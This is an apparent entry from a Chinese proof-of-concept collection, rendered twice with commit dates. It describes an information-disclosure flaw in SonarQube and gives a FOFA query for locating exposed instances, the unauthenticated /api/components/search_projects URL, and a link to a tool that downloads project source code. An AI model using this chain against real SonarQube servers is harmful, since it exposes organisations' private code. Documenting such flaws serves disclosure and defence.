Awesome-POC/Web应用漏洞/SonarQube search_projects 项目信息泄露漏洞.md

# SonarQube search_projects 项目信息泄露漏洞

## 漏洞描述

SonarQube 某接口存在信息泄露漏洞，可以通过工具下载源码

## 漏洞影响

```
SonarQube
```

## 网络测绘

```
app="sonarQube-代码管理"
```

## 漏洞复现

主页如下


![img](./images/202202101932489.png)


漏洞POC


```plain
http://xxx.xxx.xxx.xxx/api/components/search_projects
```

![img](./images/202202101932452.png)

可通过工具下载项目中的源代码 


https://github.com/deletescape/sloot

![img](./images/202202101932586.png)
Web应用漏洞 2022-05-17 17:43:20 +08:00			`# SonarQube search_projects 项目信息泄露漏洞`

			`## 漏洞描述`

			`SonarQube 某接口存在信息泄露漏洞，可以通过工具下载源码`

			`## 漏洞影响`

			```
			`SonarQube`
			```

更新漏洞 2023-08-28 15:55:36 +08:00			`## 网络测绘`
Web应用漏洞 2022-05-17 17:43:20 +08:00
			```
			`app="sonarQube-代码管理"`
			```

			`## 漏洞复现`

			`主页如下`



更新漏洞 2022-12-05 11:09:28 +08:00			`![img](./images/202202101932489.png)`
Web应用漏洞 2022-05-17 17:43:20 +08:00


			`漏洞POC`



			```plain
			`http://xxx.xxx.xxx.xxx/api/components/search_projects`
			```

更新漏洞 2022-12-05 11:09:28 +08:00			`![img](./images/202202101932452.png)`
Web应用漏洞 2022-05-17 17:43:20 +08:00
			`可通过工具下载项目中的源代码`



			`https://github.com/deletescape/sloot`

更新漏洞 2022-12-05 11:09:28 +08:00			`![img](./images/202202101932586.png)`